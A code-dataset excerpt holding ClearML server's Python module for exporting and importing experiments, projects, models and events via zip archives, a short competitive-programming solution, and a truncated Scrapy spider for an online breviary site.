apiserver.database.model import EntityVisibility, User\nfrom apiserver.database.model.model import Model\nfrom apiserver.database.model.project import Project\nfrom apiserver.database.model.task.task import (\n Task,\n ArtifactModes,\n TaskStatus,\n TaskModelTypes,\n TaskModelNames,\n)\nfrom apiserver.database.utils import get_options\nfrom apiserver.utilities import json\nfrom apiserver.utilities.dicts import nested_get, nested_set, nested_delete\nfrom apiserver.utilities.parameter_key_escaper import ParameterKeyEscaper\n\n\nclass PrePopulate:\n module_name_prefix = \"apiserver.\"\n event_bll = EventBLL()\n events_file_suffix = \"_events\"\n export_tag_prefix = \"Exported:\"\n export_tag = f\"{export_tag_prefix} %Y-%m-%d %H:%M:%S\"\n metadata_filename = \"metadata.json\"\n zip_args = dict(mode=\"w\", compression=ZIP_BZIP2)\n artifacts_ext = \".artifacts\"\n img_source_regex = re.compile(\n r\"['\\\"]source['\\\"]:\\s?['\\\"](https?://(?:localhost:8081|files.*?)/.*?)['\\\"]\",\n flags=re.IGNORECASE,\n )\n _name_guid_ns = UUID(\"bda3acc1-e612-506c-bade-80071b6cf039\")\n _example_id_prefix = \"e-\"\n task_cls: Type[Task]\n project_cls: Type[Project]\n model_cls: Type[Model]\n user_cls: Type[User]\n\n # noinspection PyTypeChecker\n @classmethod\n def _init_entity_types(cls):\n if not hasattr(cls, \"task_cls\"):\n cls.task_cls = cls._get_entity_type(\"database.model.task.task.Task\")\n if not hasattr(cls, \"model_cls\"):\n cls.model_cls = cls._get_entity_type(\"database.model.model.Model\")\n if not hasattr(cls, \"project_cls\"):\n cls.project_cls = cls._get_entity_type(\"database.model.project.Project\")\n if not hasattr(cls, \"user_cls\"):\n cls.user_cls = cls._get_entity_type(\"database.model.User\")\n\n class JsonLinesWriter:\n def __init__(self, file: BinaryIO):\n self.file = file\n self.empty = True\n\n def __enter__(self):\n self._write(\"[\")\n return self\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n self._write(\"\\n]\")\n\n def _write(self, data: str):\n self.file.write(data.encode(\"utf-8\"))\n\n def write(self, line: str):\n if not self.empty:\n self._write(\",\")\n self._write(\"\\n\" + line)\n self.empty = False\n\n @staticmethod\n def _get_last_update_time(entity) -> datetime:\n return getattr(entity, \"last_update\", None) or getattr(entity, \"created\")\n\n @classmethod\n def _check_for_update(\n cls, map_file: Path, entities: dict, metadata_hash: str\n ) -> Tuple[bool, Sequence[str]]:\n if not map_file.is_file():\n return True, []\n\n files = []\n try:\n map_data = json.loads(map_file.read_text())\n files = map_data.get(\"files\", [])\n for file in files:\n if not Path(file).is_file():\n return True, files\n\n new_times = {\n item.id: cls._get_last_update_time(item).replace(tzinfo=timezone.utc)\n for item in chain.from_iterable(entities.values())\n }\n old_times = map_data.get(\"entities\", {})\n\n if set(new_times.keys()) != set(old_times.keys()):\n return True, files\n\n for id_, new_timestamp in new_times.items():\n if new_timestamp != old_times[id_]:\n return True, files\n\n if metadata_hash != map_data.get(\"metadata_hash\", \"\"):\n return True, files\n\n except Exception as ex:\n print(\"Error reading map file. 
\" + str(ex))\n return True, files\n\n return False, files\n\n @classmethod\n def _write_update_file(\n cls,\n map_file: Path,\n entities: dict,\n created_files: Sequence[str],\n metadata_hash: str,\n ):\n map_file.write_text(\n json.dumps(\n dict(\n files=created_files,\n entities={\n entity.id: cls._get_last_update_time(entity)\n for entity in chain.from_iterable(entities.values())\n },\n metadata_hash=metadata_hash,\n )\n )\n )\n\n @staticmethod\n def _filter_artifacts(artifacts: Sequence[str]) -> Sequence[str]:\n def is_fileserver_link(a: str) -> bool:\n a = a.lower()\n if a.startswith(\"https://files.\"):\n return True\n if a.startswith(\"http\"):\n parsed = urlparse(a)\n if parsed.scheme in {\"http\", \"https\"} and parsed.netloc.endswith(\n \"8081\"\n ):\n return True\n return False\n\n fileserver_links = [a for a in artifacts if is_fileserver_link(a)]\n print(\n f\"Found {len(fileserver_links)} files on the fileserver from {len(artifacts)} total\"\n )\n\n return fileserver_links\n\n @classmethod\n def export_to_zip(\n cls,\n filename: str,\n experiments: Sequence[str] = None,\n projects: Sequence[str] = None,\n artifacts_path: str = None,\n task_statuses: Sequence[str] = None,\n tag_exported_entities: bool = False,\n metadata: Mapping[str, Any] = None,\n ) -> Sequence[str]:\n cls._init_entity_types()\n\n if task_statuses and not set(task_statuses).issubset(get_options(TaskStatus)):\n raise ValueError(\"Invalid task statuses\")\n\n file = Path(filename)\n entities = cls._resolve_entities(\n experiments=experiments, projects=projects, task_statuses=task_statuses\n )\n\n hash_ = hashlib.md5()\n if metadata:\n meta_str = json.dumps(metadata)\n hash_.update(meta_str.encode())\n metadata_hash = hash_.hexdigest()\n else:\n meta_str, metadata_hash = \"\", \"\"\n\n map_file = file.with_suffix(\".map\")\n updated, old_files = cls._check_for_update(\n map_file, entities=entities, metadata_hash=metadata_hash\n )\n if not updated:\n print(f\"There are no updates from the last export\")\n return old_files\n\n for old in old_files:\n old_path = Path(old)\n if old_path.is_file():\n old_path.unlink()\n\n with ZipFile(file, **cls.zip_args) as zfile:\n if metadata:\n zfile.writestr(cls.metadata_filename, meta_str)\n artifacts = cls._export(\n zfile,\n entities=entities,\n hash_=hash_,\n tag_entities=tag_exported_entities,\n )\n\n file_with_hash = file.with_name(f\"{file.stem}_{hash_.hexdigest()}{file.suffix}\")\n file.replace(file_with_hash)\n created_files = [str(file_with_hash)]\n\n artifacts = cls._filter_artifacts(artifacts)\n if artifacts and artifacts_path and os.path.isdir(artifacts_path):\n artifacts_file = file_with_hash.with_suffix(cls.artifacts_ext)\n with ZipFile(artifacts_file, **cls.zip_args) as zfile:\n cls._export_artifacts(zfile, artifacts, artifacts_path)\n created_files.append(str(artifacts_file))\n\n cls._write_update_file(\n map_file,\n entities=entities,\n created_files=created_files,\n metadata_hash=metadata_hash,\n )\n\n return created_files\n\n @classmethod\n def import_from_zip(\n cls,\n filename: str,\n artifacts_path: str,\n company_id: Optional[str] = None,\n user_id: str = \"\",\n user_name: str = \"\",\n ):\n cls._init_entity_types()\n\n metadata = None\n\n with ZipFile(filename) as zfile:\n try:\n with zfile.open(cls.metadata_filename) as f:\n metadata = json.loads(f.read())\n\n meta_public = metadata.get(\"public\")\n if company_id is None and meta_public is not None:\n company_id = \"\" if meta_public else get_default_company()\n\n if not user_id:\n meta_user_id = 
metadata.get(\"user_id\", \"\")\n meta_user_name = metadata.get(\"user_name\", \"\")\n user_id, user_name = meta_user_id, meta_user_name\n except Exception:\n pass\n\n if not user_id:\n user_id, user_name = \"__allegroai__\", \"Allegro.ai\"\n\n # Make sure we won't end up with an invalid company ID\n if company_id is None:\n company_id = \"\"\n\n existing_user = cls.user_cls.objects(id=user_id).only(\"id\").first()\n if not existing_user:\n cls.user_cls(id=user_id, name=user_name, company=company_id).save()\n\n cls._import(zfile, company_id, user_id, metadata)\n\n if artifacts_path and os.path.isdir(artifacts_path):\n artifacts_file = Path(filename).with_suffix(cls.artifacts_ext)\n if artifacts_file.is_file():\n print(f\"Unzipping artifacts into {artifacts_path}\")\n with ZipFile(artifacts_file) as zfile:\n zfile.extractall(artifacts_path)\n\n @classmethod\n def upgrade_zip(cls, filename) -> Sequence:\n hash_ = hashlib.md5()\n task_file = cls._get_base_filename(cls.task_cls) + \".json\"\n temp_file = Path(\"temp.zip\")\n file = Path(filename)\n with ZipFile(file) as reader, ZipFile(temp_file, **cls.zip_args) as writer:\n for file_info in reader.filelist:\n if file_info.orig_filename == task_file:\n with reader.open(file_info) as f:\n content = cls._upgrade_tasks(f)\n else:\n content = reader.read(file_info)\n writer.writestr(file_info, content)\n hash_.update(content)\n\n base_file_name, _, old_hash = file.stem.rpartition(\"_\")\n new_hash = hash_.hexdigest()\n if old_hash == new_hash:\n print(f\"The file {filename} was not updated\")\n temp_file.unlink()\n return []\n\n new_file = file.with_name(f\"{base_file_name}_{new_hash}{file.suffix}\")\n temp_file.replace(new_file)\n upadated = [str(new_file)]\n\n artifacts_file = file.with_suffix(cls.artifacts_ext)\n if artifacts_file.is_file():\n new_artifacts = new_file.with_suffix(cls.artifacts_ext)\n artifacts_file.replace(new_artifacts)\n upadated.append(str(new_artifacts))\n\n print(f\"File {str(file)} replaced with {str(new_file)}\")\n file.unlink()\n\n return upadated\n\n @classmethod\n def _upgrade_tasks(cls, f: IO[bytes]) -> bytes:\n \"\"\"\n Build content array that contains upgraded tasks from the passed file\n For each task the old execution.parameters and model.design are\n converted to the new structure.\n The fix is done on Task objects (not the dictionary) so that\n the fields are serialized back in the same order as they were in the original file\n \"\"\"\n with BytesIO() as temp:\n with cls.JsonLinesWriter(temp) as w:\n for line in cls.json_lines(f):\n task_data = cls.task_cls.from_json(line).to_proper_dict()\n cls._upgrade_task_data(task_data)\n new_task = cls.task_cls(**task_data)\n w.write(new_task.to_json())\n return temp.getvalue()\n\n @classmethod\n def update_featured_projects_order(cls):\n order = config.get(\"services.projects.featured.order\", [])\n if not order:\n return\n\n public_default = config.get(\"services.projects.featured.public_default\", 9999)\n\n def get_index(p: Project):\n for index, entry in enumerate(order):\n if (\n entry.get(\"id\", None) == p.id\n or entry.get(\"name\", None) == p.name\n or (\"name_regex\" in entry and re.match(entry[\"name_regex\"], p.name))\n ):\n return index\n return public_default\n\n for project in cls.project_cls.get_many_public(projection=[\"id\", \"name\"]):\n featured_index = get_index(project)\n cls.project_cls.objects(id=project.id).update(featured=featured_index)\n\n @staticmethod\n def _resolve_type(\n cls: Type[mongoengine.Document], ids: Optional[Sequence[str]]\n ) -> 
Sequence[Any]:\n ids = set(ids)\n items = list(cls.objects(id__in=list(ids)))\n resolved = {i.id for i in items}\n missing = ids - resolved\n for name_candidate in missing:\n results = list(cls.objects(name=name_candidate))\n if not results:\n print(f\"ERROR: no match for `{name_candidate}`\")\n exit(1)\n elif len(results) > 1:\n print(f\"ERROR: more than one match for `{name_candidate}`\")\n exit(1)\n items.append(results[0])\n return items\n\n @classmethod\n def _check_projects_hierarchy(cls, projects: Set[Project]):\n \"\"\"\n For any exported project all its parents up to the root should be present\n \"\"\"\n if not projects:\n return\n\n project_ids = {p.id for p in projects}\n orphans = [p.id for p in projects if p.parent and p.parent not in project_ids]\n if not orphans:\n return\n\n print(\n f\"ERROR: the following projects are exported without their parents: {orphans}\"\n )\n exit(1)\n\n @classmethod\n def _resolve_entities(\n cls,\n experiments: Sequence[str] = None,\n projects: Sequence[str] = None,\n task_statuses: Sequence[str] = None,\n ) -> Dict[Type[mongoengine.Document], Set[mongoengine.Document]]:\n entities = defaultdict(set)\n\n if projects:\n print(\"Reading projects...\")\n projects = project_ids_with_children(projects)\n entities[cls.project_cls].update(\n cls._resolve_type(cls.project_cls, projects)\n )\n print(\"--> Reading project experiments...\")\n query = Q(\n project__in=list(\n set(filter(None, (p.id for p in entities[cls.project_cls])))\n ),\n system_tags__nin=[EntityVisibility.archived.value],\n )\n if task_statuses:\n query &= Q(status__in=list(set(task_statuses)))\n objs = cls.task_cls.objects(query)\n entities[cls.task_cls].update(\n o for o in objs if o.id not in (experiments or [])\n )\n\n if experiments:\n print(\"Reading experiments...\")\n entities[cls.task_cls].update(cls._resolve_type(cls.task_cls, experiments))\n print(\"--> Reading experiments projects...\")\n objs = cls.project_cls.objects(\n id__in=list(\n set(filter(None, (p.project for p in entities[cls.task_cls])))\n )\n )\n project_ids = {p.id for p in entities[cls.project_cls]}\n entities[cls.project_cls].update(o for o in objs if o.id not in project_ids)\n\n cls._check_projects_hierarchy(entities[cls.project_cls])\n\n task_models = chain.from_iterable(\n models\n for task in entities[cls.task_cls]\n if task.models\n for models in (task.models.input, task.models.output)\n if models\n )\n model_ids = {tm.model for tm in task_models}\n if model_ids:\n print(\"Reading models...\")\n entities[cls.model_cls] = set(cls.model_cls.objects(id__in=list(model_ids)))\n\n return entities\n\n @classmethod\n def _filter_out_export_tags(cls, tags: Sequence[str]) -> Sequence[str]:\n if not tags:\n return tags\n return [tag for tag in tags if not tag.startswith(cls.export_tag_prefix)]\n\n @classmethod\n def _cleanup_model(cls, model: Model):\n model.company = \"\"\n model.user = \"\"\n model.tags = cls._filter_out_export_tags(model.tags)\n\n @classmethod\n def _cleanup_task(cls, task: Task):\n task.comment = \"Auto generated by Allegro.ai\"\n task.status_message = \"\"\n task.status_reason = \"\"\n task.user = \"\"\n task.company = \"\"\n task.tags = cls._filter_out_export_tags(task.tags)\n if task.output:\n task.output.destination = None\n\n @classmethod\n def _cleanup_project(cls, project: Project):\n project.user = \"\"\n project.company = \"\"\n project.tags = cls._filter_out_export_tags(project.tags)\n\n @classmethod\n def _cleanup_entity(cls, entity_cls, entity):\n if entity_cls == cls.task_cls:\n 
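# scrub company/user ownership and export tags so the entity can be re-imported elsewhere\n            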
cls._cleanup_task(entity)\n        elif entity_cls == cls.model_cls:\n            cls._cleanup_model(entity)\n        elif entity_cls == cls.project_cls:\n            cls._cleanup_project(entity)\n\n    @classmethod\n    def _add_tag(cls, items: Sequence[Union[Project, Task, Model]], tag: str):\n        try:\n            for item in items:\n                item.update(upsert=False, tags=sorted(item.tags + [tag]))\n        except AttributeError:\n            pass\n\n    @classmethod\n    def _export_task_events(\n        cls, task: Task, base_filename: str, writer: ZipFile, hash_\n    ) -> Sequence[str]:\n        artifacts = []\n        filename = f\"{base_filename}_{task.id}{cls.events_file_suffix}.json\"\n        print(f\"Writing task events into {writer.filename}:{filename}\")\n        with BytesIO() as f:\n            with cls.JsonLinesWriter(f) as w:\n                scroll_id = None\n                while True:\n                    res = cls.event_bll.get_task_events(\n                        company_id=task.company,\n                        task_id=task.id,\n                        event_type=EventType.all,\n                        scroll_id=scroll_id,\n                    )\n                    if not res.events:\n                        break\n                    scroll_id = res.next_scroll_id\n                    for event in res.events:\n                        event_type = event.get(\"type\")\n                        if event_type == EventType.metrics_image.value:\n                            url = cls._get_fixed_url(event.get(\"url\"))\n                            if url:\n                                event[\"url\"] = url\n                                artifacts.append(url)\n                        elif event_type == EventType.metrics_plot.value:\n                            plot_str: str = event.get(\"plot_str\", \"\")\n                            for match in cls.img_source_regex.findall(plot_str):\n                                url = cls._get_fixed_url(match)\n                                if match != url:\n                                    plot_str = plot_str.replace(match, url)\n                                artifacts.append(url)\n                        w.write(json.dumps(event))\n            data = f.getvalue()\n        hash_.update(data)\n        writer.writestr(filename, data)\n\n        return artifacts\n\n    @staticmethod\n    def _get_fixed_url(url: Optional[str]) -> Optional[str]:\n        if not (url and url.lower().startswith(\"s3://\")):\n            return url\n        try:\n            fixed = furl(url)\n            fixed.scheme = \"https\"\n            fixed.host += \".s3.amazonaws.com\"\n            return fixed.url\n        except Exception as ex:\n            print(f\"Failed processing link {url}. 
\" + str(ex))\n return url\n\n @classmethod\n def _export_entity_related_data(\n cls, entity_cls, entity, base_filename: str, writer: ZipFile, hash_\n ):\n if entity_cls == cls.task_cls:\n return [\n *cls._get_task_output_artifacts(entity),\n *cls._export_task_events(entity, base_filename, writer, hash_),\n ]\n\n if entity_cls == cls.model_cls:\n entity.uri = cls._get_fixed_url(entity.uri)\n return [entity.uri] if entity.uri else []\n\n return []\n\n @classmethod\n def _get_task_output_artifacts(cls, task: Task) -> Sequence[str]:\n if not task.execution.artifacts:\n return []\n\n for a in task.execution.artifacts.values():\n if a.mode == ArtifactModes.output:\n a.uri = cls._get_fixed_url(a.uri)\n\n return [\n a.uri\n for a in task.execution.artifacts.values()\n if a.mode == ArtifactModes.output and a.uri\n ]\n\n @classmethod\n def _export_artifacts(\n cls, writer: ZipFile, artifacts: Sequence[str], artifacts_path: str\n ):\n unique_paths = set(unquote(str(furl(artifact).path)) for artifact in artifacts)\n print(f\"Writing {len(unique_paths)} artifacts into {writer.filename}\")\n for path in unique_paths:\n path = path.lstrip(\"/\")\n full_path = os.path.join(artifacts_path, path)\n if os.path.isfile(full_path):\n writer.write(full_path, path)\n else:\n print(f\"Artifact {full_path} not found\")\n\n @classmethod\n def _get_base_filename(cls, cls_: type):\n name = f\"{cls_.__module__}.{cls_.__name__}\"\n if cls.module_name_prefix and name.startswith(cls.module_name_prefix):\n name = name[len(cls.module_name_prefix) :]\n return name\n\n @classmethod\n def _export(\n cls, writer: ZipFile, entities: dict, hash_, tag_entities: bool = False\n ) -> Sequence[str]:\n \"\"\"\n Export the requested experiments, projects and models and return the list of artifact files\n Always do the export on sorted items since the order of items influence hash\n The projects should be sorted by name so that on import the hierarchy is correctly restored from top to bottom\n \"\"\"\n artifacts = []\n now = datetime.utcnow()\n for cls_ in sorted(entities, key=attrgetter(\"__name__\")):\n items = sorted(entities[cls_], key=attrgetter(\"name\", \"id\"))\n if not items:\n continue\n base_filename = cls._get_base_filename(cls_)\n for item in items:\n artifacts.extend(\n cls._export_entity_related_data(\n cls_, item, base_filename, writer, hash_\n )\n )\n filename = base_filename + \".json\"\n print(f\"Writing {len(items)} items into {writer.filename}:{filename}\")\n with BytesIO() as f:\n with cls.JsonLinesWriter(f) as w:\n for item in items:\n cls._cleanup_entity(cls_, item)\n w.write(item.to_json())\n data = f.getvalue()\n hash_.update(data)\n writer.writestr(filename, data)\n\n if tag_entities:\n cls._add_tag(items, now.strftime(cls.export_tag))\n\n return artifacts\n\n @staticmethod\n def json_lines(file: IO[bytes]):\n for line in file:\n clean = (\n line.decode(\"utf-8\")\n .rstrip(\"\\r\\n\")\n .strip()\n .lstrip(\"[\")\n .rstrip(\",]\")\n .strip()\n )\n if not clean:\n continue\n yield clean\n\n @staticmethod\n def _new_id(_):\n return str(uuid4()).replace(\"-\", \"\")\n\n @classmethod\n def _hash_id(cls, name: str):\n return str(uuid5(cls._name_guid_ns, name)).replace(\"-\", \"\")\n\n @classmethod\n def _example_id(cls, orig_id: str):\n if not orig_id or orig_id.startswith(cls._example_id_prefix):\n return orig_id\n\n return cls._example_id_prefix + orig_id\n\n @classmethod\n def _private_id(cls, orig_id: str):\n if not orig_id or not orig_id.startswith(cls._example_id_prefix):\n return orig_id\n\n return 
orig_id[len(cls._example_id_prefix) :]\n\n @classmethod\n def _generate_new_ids(\n cls, reader: ZipFile, entity_files: Sequence, metadata: Mapping[str, Any],\n ) -> Mapping[str, str]:\n if not metadata or not any(\n metadata.get(key) for key in (\"new_ids\", \"example_ids\", \"private_ids\")\n ):\n return {}\n\n ids = {}\n for entity_file in entity_files:\n with reader.open(entity_file) as f:\n is_project = splitext(entity_file.orig_filename)[0].endswith(\".Project\")\n if metadata.get(\"new_ids\"):\n id_func = cls._new_id\n elif metadata.get(\"example_ids\"):\n id_func = cls._example_id if not is_project else cls._hash_id\n elif metadata.get(\"private_ids\"):\n id_func = cls._private_id if not is_project else cls._new_id\n for item in cls.json_lines(f):\n doc = json.loads(item)\n orig_id = doc.get(\"_id\")\n if orig_id:\n ids[orig_id] = (\n id_func(orig_id)\n if id_func != cls._hash_id\n else id_func(doc.get(\"name\"))\n )\n return ids\n\n @classmethod\n def _import(\n cls,\n reader: ZipFile,\n company_id: str = \"\",\n user_id: str = None,\n metadata: Mapping[str, Any] = None,\n sort_tasks_by_last_updated: bool = True,\n ):\n \"\"\"\n Import entities and events from the zip file\n Start from entities since event import will require the tasks already in DB\n \"\"\"\n event_file_ending = cls.events_file_suffix + \".json\"\n entity_files = [\n fi\n for fi in reader.filelist\n if not fi.orig_filename.endswith(event_file_ending)\n and fi.orig_filename != cls.metadata_filename\n ]\n metadata = metadata or {}\n old_to_new_ids = cls._generate_new_ids(reader, entity_files, metadata)\n tasks = []\n for entity_file in entity_files:\n with reader.open(entity_file) as f:\n full_name = splitext(entity_file.orig_filename)[0]\n print(f\"Reading {reader.filename}:{full_name}...\")\n res = cls._import_entity(\n f, full_name, company_id, user_id, metadata, old_to_new_ids\n )\n if res:\n tasks = res\n\n if sort_tasks_by_last_updated:\n tasks = sorted(tasks, key=attrgetter(\"last_update\"))\n\n new_to_old_ids = {v: k for k, v in old_to_new_ids.items()}\n for task in tasks:\n old_task_id = new_to_old_ids.get(task.id, task.id)\n events_file = first(\n fi\n for fi in reader.filelist\n if fi.orig_filename.endswith(old_task_id + event_file_ending)\n )\n if not events_file:\n continue\n with reader.open(events_file) as f:\n full_name = splitext(events_file.orig_filename)[0]\n print(f\"Reading {reader.filename}:{full_name}...\")\n cls._import_events(f, company_id, user_id, task.id)\n\n @classmethod\n def _get_entity_type(cls, full_name) -> Type[mongoengine.Document]:\n module_name, _, class_name = full_name.rpartition(\".\")\n if cls.module_name_prefix and not module_name.startswith(\n cls.module_name_prefix\n ):\n module_name = cls.module_name_prefix + module_name\n module = importlib.import_module(module_name)\n return getattr(module, class_name)\n\n @staticmethod\n def _upgrade_project_data(project_data: dict) -> dict:\n if not project_data.get(\"basename\"):\n name: str = project_data[\"name\"]\n _, _, basename = name.rpartition(\"/\")\n project_data[\"basename\"] = basename\n\n return project_data\n\n @staticmethod\n def _upgrade_model_data(model_data: dict) -> dict:\n metadata_key = \"metadata\"\n metadata = model_data.get(metadata_key)\n if isinstance(metadata, list):\n metadata = {\n ParameterKeyEscaper.escape(item[\"key\"]): item\n for item in metadata\n if isinstance(item, dict) and \"key\" in item\n }\n model_data[metadata_key] = metadata\n return model_data\n\n @staticmethod\n def 
_upgrade_task_data(task_data: dict) -> dict:\n        \"\"\"\n        Migrate from execution/parameters and model_desc to hyperparams and configuration fields\n        Upgrade artifacts list to dict\n        Migrate from execution.model and output.model to the new models field\n        Move docker_cmd contents into the container field\n        :param task_data: Upgraded in place\n        :return: The upgraded task data\n        \"\"\"\n        for old_param_field, new_param_field, default_section in (\n            (\"execution.parameters\", \"hyperparams\", hyperparams_default_section),\n            (\"execution.model_desc\", \"configuration\", None),\n        ):\n            legacy_path = old_param_field.split(\".\")\n            legacy = nested_get(task_data, legacy_path)\n            if legacy:\n                for full_name, value in legacy.items():\n                    section, name = split_param_name(full_name, default_section)\n                    new_path = list(filter(None, (new_param_field, section, name)))\n                    if not nested_get(task_data, new_path):\n                        new_param = dict(\n                            name=name, type=hyperparams_legacy_type, value=str(value)\n                        )\n                        if section is not None:\n                            new_param[\"section\"] = section\n                        nested_set(task_data, path=new_path, value=new_param)\n                nested_delete(task_data, legacy_path)\n\n        artifacts_path = (\"execution\", \"artifacts\")\n        artifacts = nested_get(task_data, artifacts_path)\n        if isinstance(artifacts, list):\n            nested_set(\n                task_data,\n                path=artifacts_path,\n                value={get_artifact_id(a): a for a in artifacts},\n            )\n\n        models = task_data.get(\"models\", {})\n        now = datetime.utcnow()\n        for old_field, type_ in (\n            (\"execution.model\", TaskModelTypes.input),\n            (\"output.model\", TaskModelTypes.output),\n        ):\n            old_path = old_field.split(\".\")\n            old_model = nested_get(task_data, old_path)\n            new_models = models.get(type_, [])\n            name = TaskModelNames[type_]\n            if old_model and not any(\n                m\n                for m in new_models\n                if m.get(\"model\") == old_model or m.get(\"name\") == name\n            ):\n                model_item = {\"model\": old_model, \"name\": name, \"updated\": now}\n                if type_ == TaskModelTypes.input:\n                    new_models = [model_item, *new_models]\n                else:\n                    new_models = [*new_models, model_item]\n                models[type_] = new_models\n            nested_delete(task_data, old_path)\n        task_data[\"models\"] = models\n\n        docker_cmd_path = (\"execution\", \"docker_cmd\")\n        docker_cmd = nested_get(task_data, docker_cmd_path)\n        if docker_cmd and not task_data.get(\"container\"):\n            image, _, arguments = docker_cmd.partition(\" \")\n            task_data[\"container\"] = {\"image\": image, \"arguments\": arguments}\n            nested_delete(task_data, docker_cmd_path)\n\n        return task_data\n\n    @classmethod\n    def _import_entity(\n        cls,\n        f: IO[bytes],\n        full_name: str,\n        company_id: str,\n        user_id: str,\n        metadata: Mapping[str, Any],\n        old_to_new_ids: Mapping[str, str] = None,\n    ) -> Optional[Sequence[Task]]:\n        cls_ = cls._get_entity_type(full_name)\n        print(f\"Writing {cls_.__name__.lower()}s into database\")\n        tasks = []\n        override_project_count = 0\n        data_upgrade_funcs: Mapping[Type, Callable] = {\n            cls.task_cls: cls._upgrade_task_data,\n            cls.model_cls: cls._upgrade_model_data,\n            cls.project_cls: cls._upgrade_project_data,\n        }\n        for item in cls.json_lines(f):\n            if old_to_new_ids:\n                for old_id, new_id in old_to_new_ids.items():\n                    # replace ids only when they are standalone strings\n                    # otherwise artifacts uris that contain old ids may get damaged\n                    item = item.replace(f'\"{old_id}\"', f'\"{new_id}\"')\n            upgrade_func = data_upgrade_funcs.get(cls_)\n            if upgrade_func:\n                item = json.dumps(upgrade_func(json.loads(item)))\n\n            doc = cls_.from_json(item, created=True)\n            
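# assign ownership to the importing user/company instead of trusting values from the archive\n            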
\"company\"):\n doc.company = company_id\n if isinstance(doc, cls.project_cls):\n override_project_name = metadata.get(\"project_name\", None)\n if override_project_name:\n if override_project_count:\n override_project_name = (\n f\"{override_project_name} {override_project_count + 1}\"\n )\n override_project_count += 1\n doc.name = override_project_name\n\n doc.logo_url = metadata.get(\"logo_url\", None)\n doc.logo_blob = metadata.get(\"logo_blob\", None)\n\n cls_.objects(company=company_id, name=doc.name, id__ne=doc.id).update(\n set__name=f\"{doc.name}_{datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S')}\"\n )\n\n doc.save()\n\n if isinstance(doc, cls.task_cls):\n tasks.append(doc)\n cls.event_bll.delete_task_events(company_id, doc.id, allow_locked=True)\n\n if tasks:\n return tasks\n\n @classmethod\n def _import_events(cls, f: IO[bytes], company_id: str, _, task_id: str):\n print(f\"Writing events for task {task_id} into database\")\n for events_chunk in chunked_iter(cls.json_lines(f), 1000):\n events = [json.loads(item) for item in events_chunk]\n for ev in events:\n ev[\"task\"] = task_id\n ev[\"company_id\"] = company_id\n ev[\"allow_locked\"] = True\n cls.event_bll.add_events(\n company_id, events=events, worker=\"\"\n )\n","repo_name":"allegroai/clearml-server","sub_path":"apiserver/mongo/initialize/pre_populate.py","file_name":"pre_populate.py","file_ext":"py","file_size_in_byte":35794,"program_lang":"python","lang":"en","doc_type":"code","stars":334,"dataset":"github-code","pt":"21"} +{"seq_id":"35843131441","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\ndef _chicken(i, gap):\n\tif i > t:\n\t\treturn 0\n\tif dp[i - gap] + 1 > dp[i]:\n\t\tdp[i] = dp[i - gap] + 1\n\t_chicken(i+a, a)\n\t_chicken(i+b, b)\n\ndef chicken(i, a, b):\n\t_chicken(i+a, a)\n\t_chicken(i+b, b)\n\tif dp[t] != 0:\n\t\tprint(dp[t])\n\telse:\n\t\tcnt = 1\n\t\tfor i in range(t-1, 0, -1):\n\t\t\tif dp[i] != 0:\n\t\t\t\tprint(dp[i], cnt)\n\t\t\t\tbreak\n\t\t\tcnt += 1\n\nif __name__ == '__main__':\n\ta, b, t = map(int, input().split())\n\tdp = [0] * (t+1)\n\tchicken(0, a, b)\n\n'''\nO(t^2)\n'''","repo_name":"zinnnn37/4-1_Competitive_Programming_and_Practice","sub_path":"week10/chicken_rec.py","file_name":"chicken_rec.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17491663610","text":"import scrapy\nfrom scrapy.http.request import Request\nfrom datetime import datetime\n\nclass IbrevSpider(scrapy.Spider):\n name = 'ibrev'\n allowed_domains = ['ibreviary.com']\n start_urls = ['http://www.ibreviary.com/m2/breviario.php']\n date_object = datetime.strptime(\"03/14/2022\", \"%m/%d/%Y\")\n \n def parse(self,response):\n #lang=en&giorno=14&mese=3&anno=2022&ok=ok\n \n my_data = self.date_object.strftime('lang=en&giorno=%d&mese=%m&anno=%Y&ok=ok')\n yield Request(self.start_urls[0],\n method='POST', \n body=my_data, \n headers={'Content-Type': 'application/x-www-form-urlencoded'},\n callback=self.parse_day)\n \n def parse_hour(self, hour):\n \"\"\"\n parse_day gets basic info of day.\n\n :param hour: 0=OoR, 1=MP, 2=DP, 3=EP, 4=NP\n :return: describe what it returns\n \"\"\"\n print(\"FF\")\n hours_url_string = [\"s=ufficio_delle_letture\",\"s=lodi\",\"s=ora_media\",\"s=vespri\",\"s=compieta\"]\n hour_functions = [\"parse_office\",\"parse_lauds\",\"parse_midday\",\"parse_vespers\",\"parse_compline\"]\n self.date_object.strftime('lang=en&giorno=%d&mese=%m&anno=%Y&ok=ok')\n yield 
yield Request(self.start_urls[0]+hours_url_string[hour],\n                      method='POST', \n                      body=my_data, \n                      headers={'Content-Type': 'application/x-www-form-urlencoded'},\n                      callback=getattr(self, hour_functions[hour])\n                      )\n\n    def parse_office(self, response):\n        print(\"PO\")\n        ant_one_sel = \"//*[@id='contenuto']/div/p[5]/text()[1]\"\n        ant_two_sel = \"//*[@id='contenuto']/div/p[5]/text()[49]\"\n        ant_three_sel = \"//*[@id='contenuto']/div/p[5]/text()[73]\"\n        \n        rand = \"//*[@id='contenuto']/div/p[2]/span[1]\"\n        print(response.xpath(rand).get())\n        print(response.xpath(ant_one_sel).get())\n        print(response.xpath(ant_two_sel).get())\n        print(response.xpath(ant_three_sel).get())\n        \n    def parse_day(self, response):\n        \"\"\"\n        parse_day gets basic info of the day.\n\n        :return: a dict with the day's title; further hours are requested via parse_hour\n        \"\"\"\n        # Tuesday, 15 March 2022\n        day_title_sel = \"//*[@id='contenuto']/div/p[1]/text()\"\n        \n        # Tuesday of the Second Week of Lent\n        day_liturgical_title_sel = \"//*[@id='contenuto']/div/p[2]/text()\"\n        \n        # Tipo: Feriale - Tempo: Quaresima\n        season_sel = \"//*[@id='contenuto']/div/p[3]/text()\"\n\n        # [\"Tipo: Feriale\",\"Tempo: Quaresima\"]\n        day_type_season_delimiter = \" - \"\n        \n        # [\"Tipo\",\"Feriale\"]\n        type_text_delimiter = \": \"\n        \n        day_types_it = [\"Feriale\",\"Festivo\"]\n        day_types_en = [\"Of the Day\",\"Feast\"]\n        \n        season_it = [\"Ordinario\",\"Quaresima\",\"Natale\",\"Avvento\",\"Pasqua\"]\n        season_en = [\"Ordinary 